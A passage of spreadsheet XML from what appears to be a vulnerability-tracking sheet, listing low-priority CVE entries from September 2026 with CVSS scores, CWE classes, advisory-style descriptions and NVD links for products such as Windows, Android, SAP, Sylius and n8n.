t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1503" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1503" s="5" t="inlineStr" /><c r="R1503" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1503" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows CD-ROM Driver allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1503" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78508</t></is></c></row><row r="1504"><c r="A1504" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1504" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1504" s="5" t="inlineStr"><is><t>CVE-2026-78971</t></is></c><c r="D1504" s="5" t="n"><v>4.6</v></c><c r="E1504" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1504" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1504" s="5" t="inlineStr" /><c r="H1504" s="5" t="n"><v>0.002</v></c><c r="I1504" s="5" t="inlineStr" /><c r="J1504" s="5" t="inlineStr" /><c r="K1504" s="5" t="inlineStr" /><c r="L1504" s="5" t="inlineStr" /><c r="M1504" s="5" t="inlineStr" /><c r="N1504" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1504" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1504" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1504" s="5" t="inlineStr" /><c r="R1504" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="S1504" s="5" t="inlineStr"><is><t>In Halo &lt;= 2.25.4, the plugin management feature allows users to install/update malicious plugins, which could let attackers execute any command with Halo process permissions.</t></is></c><c r="T1504" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78971</t></is></c></row><row r="1505"><c r="A1505" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1505" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1505" s="5" t="inlineStr"><is><t>CVE-2026-0001</t></is></c><c r="D1505" s="5" t="n"><v>4.4</v></c><c r="E1505" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1505" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1505" s="5" t="inlineStr" /><c r="H1505" s="5" t="n"><v>0.002</v></c><c r="I1505" s="5" t="inlineStr" /><c r="J1505" s="5" t="inlineStr" /><c r="K1505" s="5" t="inlineStr" /><c r="L1505" s="5" t="inlineStr" /><c r="M1505" s="5" t="inlineStr" /><c r="N1505" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1505" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1505" s="5" t="inlineStr" /><c r="R1505" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1505"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r41p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1505" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0001</t></is></c></row><row r="1506"><c r="A1506" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1506" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1506" s="5" t="inlineStr"><is><t>CVE-2026-69713</t></is></c><c r="D1506" s="5" t="n"><v>4.4</v></c><c r="E1506" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1506" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1506" s="5" t="inlineStr" /><c r="H1506" s="5" t="n"><v>0.003</v></c><c r="I1506" s="5" t="inlineStr" /><c r="J1506" s="5" t="inlineStr" /><c r="K1506" s="5" t="inlineStr" /><c r="L1506" s="5" t="inlineStr" /><c r="M1506" s="5" t="inlineStr" /><c r="N1506" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1506" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1506" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1506" s="5" t="inlineStr" /><c r="R1506" s="5" t="inlineStr" /><c r="S1506" s="5" t="inlineStr"><is><t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="T1506" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t></is></c></row><row r="1507"><c r="A1507" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1507" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1507" s="5" t="inlineStr"><is><t>CVE-2026-28627</t></is></c><c r="D1507" s="5" t="n"><v>4.3</v></c><c r="E1507" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1507" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1507" s="5" t="inlineStr" /><c r="H1507" s="5" t="n"><v>0.002</v></c><c r="I1507" s="5" t="inlineStr" /><c r="J1507" s="5" t="inlineStr" /><c r="K1507" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L1507" s="5" t="inlineStr" /><c r="M1507" s="5" t="inlineStr" /><c r="N1507" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1507" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1507" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1507" s="5" t="inlineStr" /><c r="R1507" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S1507" s="5" t="inlineStr"><is><t>In btm_sec_encrypt_change of btm_sec.cc, there is a possible downgrade attack due to a logic error in the code. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1507" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28627</t></is></c></row><row r="1508"><c r="A1508" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1508" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1508" s="5" t="inlineStr"><is><t>CVE-2026-45527</t></is></c><c r="D1508" s="5" t="n"><v>4.3</v></c><c r="E1508" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1508" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1508" s="5" t="inlineStr" /><c r="H1508" s="5" t="n"><v>0.003</v></c><c r="I1508" s="5" t="inlineStr" /><c r="J1508" s="5" t="inlineStr" /><c r="K1508" s="5" t="inlineStr" /><c r="L1508" s="5" t="inlineStr" /><c r="M1508" s="5" t="inlineStr" /><c r="N1508" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1508" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1508" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1508" s="5" t="inlineStr" /><c r="R1508" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S1508" s="5" t="inlineStr"><is><t>In convertCleanApertureToRect of HeifCleanAperture.cpp, there is a possible way to cause a temporary denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T1508" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45527</t></is></c></row><row r="1509"><c r="A1509" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1509" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1509" s="5" t="inlineStr"><is><t>CVE-2026-53638</t></is></c><c r="D1509" s="5" t="n"><v>4.3</v></c><c r="E1509" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1509" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1509" s="5" t="inlineStr" /><c r="H1509" s="5" t="n"><v>0.002</v></c><c r="I1509" s="5" t="inlineStr" /><c r="J1509" s="5" t="inlineStr" /><c r="K1509" s="5" t="inlineStr" /><c r="L1509" s="5" t="inlineStr" /><c r="M1509" s="5" t="inlineStr" /><c r="N1509" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1509" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1509" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1509" s="5" t="inlineStr" /><c r="R1509" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1509" s="5" t="inlineStr"><is><t>Sylius is an Open Source eCommerce Framework on Symfony. Starting in version 2.0.0 and prior to version 2.0.18, 2.1.15, and 2.2.6, an authorization bypass vulnerability exists in the shop account API. The `PATCH /api/v2/shop/account/orders/{tokenValue}/payments/{paymentId}` endpoint, used by an authenticated shop customer to change the payment method of an order that has been placed but not yet paid (state `STATE_NEW`), does not validate that the chosen payment method is enabled for the order's channel. The equivalent checkout endpoint (`PATCH /api/v2/shop/orders/{tokenValue}/payments/{paymentId}`) correctly rejects out-of-channel payment methods with `HTTP 422`; the account endpoint silently accepts them and returns `HTTP 200`. An authenticated customer can therefore assign any globally enabled payment method to their own placed order, including methods that the store operator has explicitly excluded from that channel. The issue is fixed in versions: 2.0.18, 2.1.15, 2.2.6 and above. As a workaround, decorate the `Sylius\Bundle\ApiBundle\Changer\PaymentMethodChangerInterface` service in the application.</t></is></c><c r="T1509" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53638</t></is></c></row><row r="1510"><c r="A1510" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1510" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1510" s="5" t="inlineStr"><is><t>CVE-2026-73019</t></is></c><c r="D1510" s="5" t="n"><v>4.3</v></c><c r="E1510" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1510" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1510" s="5" t="inlineStr" /><c r="H1510" s="5" t="n"><v>0.007</v></c><c r="I1510" s="5" t="inlineStr" /><c r="J1510" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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10" s="5" t="inlineStr" /><c r="M1510" s="5" t="inlineStr" /><c r="N1510" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1510" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1510" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1510" s="5" t="inlineStr" /><c r="R1510" s="5" t="inlineStr"><is><t>CWE-41</t></is></c><c r="S1510" s="5" t="inlineStr"><is><t>Improper resolution of path equivalence in Windows URL Moniker allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T1510" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73019</t></is></c></row><row r="1511"><c r="A1511" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1511" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1511" s="5" t="inlineStr"><is><t>CVE-2026-76962</t></is></c><c r="D1511" s="5" t="n"><v>4.3</v></c><c r="E1511" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1511" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1511" s="5" t="inlineStr" /><c r="H1511" s="5" t="n"><v>0.002</v></c><c r="I1511" s="5" t="inlineStr" /><c r="J1511" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1511" s="5" t="inlineStr" /><c r="L1511" s="5" t="inlineStr" /><c r="M1511" s="5" t="inlineStr" /><c r="N1511" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1511" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1511" s="5" t="inlineStr" /><c r="R1511" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1511" s="5" t="inlineStr"><is><t>SAP S/4HANA (Manage Bank Chains app) does not perform sufficient authorization checks within certain affected functionality. An attacker with low privileges could send specially crafted requests to delete specific entries that should not be accessible to them. This results in a low impact on availability. There is no impact on confidentiality and integrity.</t></is></c><c r="T1511" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76962</t></is></c></row><row r="1512"><c r="A1512" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1512" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1512" s="5" t="inlineStr"><is><t>CVE-2026-76963</t></is></c><c r="D1512" s="5" t="n"><v>4.3</v></c><c r="E1512" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1512" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1512" s="5" t="inlineStr" /><c r="H1512" s="5" t="n"><v>0.002</v></c><c r="I1512" s="5" t="inlineStr" /><c r="J1512" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1512" s="5" t="inlineStr" /><c r="L1512" s="5" t="inlineStr" /><c r="M1512" s="5" t="inlineStr" /><c r="N1512" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1512" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1512" s="5" t="inlineStr" /><c r="R1512" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1512" s="5" t="inlineStr"><is><t>Due to a missing authorization check in Application Server ABAP of SAP NetWeaver and ABAP Platform, an authenticated attacker could gain unauthorized access to sensitive system configuration information. Successful exploitation could result in exposure of security relevant settings and internal system details, resulting in low impact on confidentiality while integrity and availability remain unaffected.</t></is></c><c r="T1512" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76963</t></is></c></row><row r="1513"><c r="A1513" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1513" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1513" s="5" t="inlineStr"><is><t>CVE-2026-76977</t></is></c><c r="D1513" s="5" t="n"><v>4.3</v></c><c r="E1513" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1513" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1513" s="5" t="inlineStr" /><c r="H1513" s="5" t="n"><v>0.002</v></c><c r="I1513" s="5" t="inlineStr" /><c r="J1513" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1513" s="5" t="inlineStr" /><c r="L1513" s="5" t="inlineStr" /><c r="M1513" s="5" t="inlineStr" /><c r="N1513" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1513" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1513" s="5" t="inlineStr" /><c r="R1513" s="5" t="inlineStr"><is><t>CWE-1289</t></is></c><c r="S1513" s="5" t="inlineStr"><is><t>SAP UI5 does not sufficiently validate the parent frame's origin against the configured allowlist. An unauthenticated attacker could host a malicious page to bypass framing restrictions. If an authenticated victim visits the attacker's page and interacts with it, the attacker could trick the victim into performing unintended actions, resulting in a low impact on integrity. There is no impact on confidentiality and availability.</t></is></c><c r="T1513" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76977</t></is></c></row><row r="1514"><c r="A1514" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1514" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1514" s="5" t="inlineStr"><is><t>CVE-2026-78455</t></is></c><c r="D1514" s="5" t="n"><v>4.3</v></c><c r="E1514" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1514" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1514" s="5" t="inlineStr" /><c r="H1514" s="5" t="n"><v>0.005</v></c><c r="I1514" s="5" t="inlineStr" /><c r="J1514" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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514" s="5" t="inlineStr" /><c r="M1514" s="5" t="inlineStr" /><c r="N1514" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1514" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1514" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1514" s="5" t="inlineStr" /><c r="R1514" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1514" s="5" t="inlineStr"><is><t>Out-of-bounds read in Xbox allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1514" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78455</t></is></c></row><row r="1515"><c r="A1515" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1515" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1515" s="5" t="inlineStr"><is><t>CVE-2026-78516</t></is></c><c r="D1515" s="5" t="n"><v>4.3</v></c><c r="E1515" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1515" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1515" s="5" t="inlineStr" /><c r="H1515" s="5" t="n"><v>0.005</v></c><c r="I1515" s="5" t="inlineStr" /><c r="J1515" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K151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15" s="5" t="inlineStr" /><c r="M1515" s="5" t="inlineStr" /><c r="N1515" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1515" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1515" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1515" s="5" t="inlineStr" /><c r="R1515" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1515" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Storage allows an unauthorized attacker to disclose information with a physical attack.</t></is></c><c r="T1515" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78516</t></is></c></row><row r="1516"><c r="A1516" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1516" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1516" s="5" t="inlineStr"><is><t>CVE-2026-79588</t></is></c><c r="D1516" s="5" t="n"><v>4.3</v></c><c r="E1516" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1516" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1516" s="5" t="inlineStr" /><c r="H1516" s="5" t="n"><v>0.001</v></c><c r="I1516" s="5" t="inlineStr" /><c r="J1516" s="5" t="inlineStr" /><c r="K1516" s="5" t="inlineStr" /><c r="L1516" s="5" t="inlineStr" /><c r="M1516" s="5" t="inlineStr" /><c r="N1516" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1516" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1516" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1516" s="5" t="inlineStr" /><c r="R1516" s="5" t="inlineStr"><is><t>CWE-319</t></is></c><c r="S1516" s="5" t="inlineStr"><is><t>U-speed WIFI4 N300 T1 Pro v1.0.0 is vulnerable to Cleartext transmission of administration credentials over HTTP.</t></is></c><c r="T1516" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79588</t></is></c></row><row r="1517"><c r="A1517" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1517" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1517" s="5" t="inlineStr"><is><t>CVE-2026-79603</t></is></c><c r="D1517" s="5" t="n"><v>4.3</v></c><c r="E1517" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1517" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1517" s="5" t="inlineStr" /><c r="H1517" s="5" t="n"><v>0.002</v></c><c r="I1517" s="5" t="inlineStr" /><c r="J1517" s="5" t="inlineStr" /><c r="K1517" s="5" t="inlineStr" /><c r="L1517" s="5" t="inlineStr" /><c r="M1517" s="5" t="inlineStr" /><c r="N1517" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1517" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1517" s="5" t="inlineStr" /><c r="R1517" s="5" t="inlineStr"><is><t>CWE-664</t></is></c><c r="S1517" s="5" t="inlineStr"><is><t>x86 PV guests can free memory pages while still keeping a stale TLB entry
pointing to them.  A TLB flush is only issued by Xen (if needed) when the
page is re-used.  Since it's possible for the page to be scrubbed ahead of
the TLB flush, there's a window where a PV guest can modify an already
scrubbed page.</t></is></c><c r="T1517" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79603</t></is></c></row><row r="1518"><c r="A1518" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1518" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1518" s="5" t="inlineStr"><is><t>CVE-2026-86736</t></is></c><c r="D1518" s="5" t="n"><v>4.3</v></c><c r="E1518" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1518" s="5" t="inlineStr" /><c r="H1518" s="5" t="n"><v>0.002</v></c><c r="I1518" s="5" t="inlineStr" /><c r="J1518" s="5" t="inlineStr" /><c r="K1518" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1518" s="5" t="inlineStr" /><c r="M1518" s="5" t="inlineStr" /><c r="N1518" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1518" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1518" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1518" s="5" t="inlineStr" /><c r="R1518" s="5" t="inlineStr"><is><t>CWE-682</t></is></c><c r="S1518" s="5" t="inlineStr"><is><t>snipe-it before 8.7.0 contains an incorrect calculation vulnerability in checkout request handling that allows authenticated users to corrupt the assets.requests_counter through duplicate submissions and cancellations without active requests. Attackers can repeatedly call cancel endpoints without active requests to drive the counter negative, or submit duplicate checkout requests to inflate the counter, misrepresenting pending demand in the admin queue.</t></is></c><c r="T1518" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86736</t></is></c></row><row r="1519"><c r="A1519" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1519" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1519" s="5" t="inlineStr"><is><t>CVE-2026-86853</t></is></c><c r="D1519" s="5" t="n"><v>4.3</v></c><c r="E1519" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1519" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1519" s="5" t="inlineStr" /><c r="H1519" s="5" t="n"><v>0.002</v></c><c r="I1519" s="5" t="inlineStr" /><c r="J1519" s="5" t="inlineStr" /><c r="K1519" s="5" t="inlineStr" /><c r="L1519" s="5" t="inlineStr" /><c r="M1519" s="5" t="inlineStr" /><c r="N1519" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1519" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1519" s="5" t="inlineStr" /><c r="R1519" s="5" t="inlineStr"><is><t>CWE-451</t></is></c><c r="S1519" s="5" t="inlineStr"><is><t>A malicious webpage could repeatedly trigger external URL schemes, causing system prompts or external application launches. This could make Firefox for iOS temporarily unusable until the page is closed. This vulnerability was fixed in Firefox for iOS 155.1.</t></is></c><c r="T1519" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86853</t></is></c></row><row r="1520"><c r="A1520" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1520" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1520" s="5" t="inlineStr"><is><t>CVE-2026-86994</t></is></c><c r="D1520" s="5" t="n"><v>4.3</v></c><c r="E1520" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1520" s="5" t="inlineStr" /><c r="H1520" s="5" t="n"><v>0.002</v></c><c r="I1520" s="5" t="inlineStr" /><c r="J1520" s="5" t="inlineStr" /><c r="K1520" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1520" s="5" t="inlineStr" /><c r="M1520" s="5" t="inlineStr" /><c r="N1520" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1520" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1520" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1520" s="5" t="inlineStr" /><c r="R1520" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1520" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the /rest/active-workflows endpoint returned every active workflow ID on the instance to any member regardless of sharing. Workflow activation, deactivation, and publication push events were also broadcast to clients that could not access the affected workflow, disclosing workflow IDs, version IDs, and activation error details. The affected paths include packages/cli/src/services/active-workflows.service.ts and packages/cli/src/workflows/workflow-push-notifier.service.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1520" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86994</t></is></c></row><row r="1521"><c r="A1521" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1521" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1521" s="5" t="inlineStr"><is><t>CVE-2026-86995</t></is></c><c r="D1521" s="5" t="n"><v>4.3</v></c><c r="E1521" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1521" s="5" t="inlineStr" /><c r="H1521" s="5" t="n"><v>0.003</v></c><c r="I1521" s="5" t="inlineStr" /><c r="J1521" s="5" t="inlineStr" /><c r="K1521" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1521" s="5" t="inlineStr" /><c r="M1521" s="5" t="inlineStr" /><c r="N1521" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1521" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1521" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1521" s="5" t="inlineStr" /><c r="R1521" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="S1521" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the Git node validated the repository parameter for fetch or pull, but setUpstream wrote a branch..remote value into repository configuration without validating it. A later fetch or pull resolved the remote from that configuration instead of the checked parameter. An authenticated workflow editor could therefore point Git at any local repository readable by the n8n process and receive its contents through packages/nodes-base/nodes/Git/GenericFunctions.ts. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1521" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86995</t></is></c></row><row r="1522"><c r="A1522" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1522" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1522" s="5" t="inlineStr"><is><t>CVE-2026-12285</t></is></c><c r="D1522" s="5" t="n"><v>4</v></c><c r="E1522" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1522" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1522" s="5" t="inlineStr" /><c r="H1522" s="5" t="n"><v>0.001</v></c><c r="I1522" s="5" t="inlineStr" /><c r="J1522" s="5" t="inlineStr" /><c r="K1522" s="5" t="inlineStr" /><c r="L1522" s="5" t="inlineStr" /><c r="M1522" s="5" t="inlineStr" /><c r="N1522" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1522" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1522" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1522" s="5" t="inlineStr" /><c r="R1522" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1522"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r41p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1522" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12285</t></is></c></row><row r="1523"><c r="A1523" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1523" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1523" s="5" t="inlineStr"><is><t>CVE-2026-80159</t></is></c><c r="D1523" s="5" t="n"><v>4</v></c><c r="E1523" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1523" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1523" s="5" t="inlineStr" /><c r="H1523" s="5" 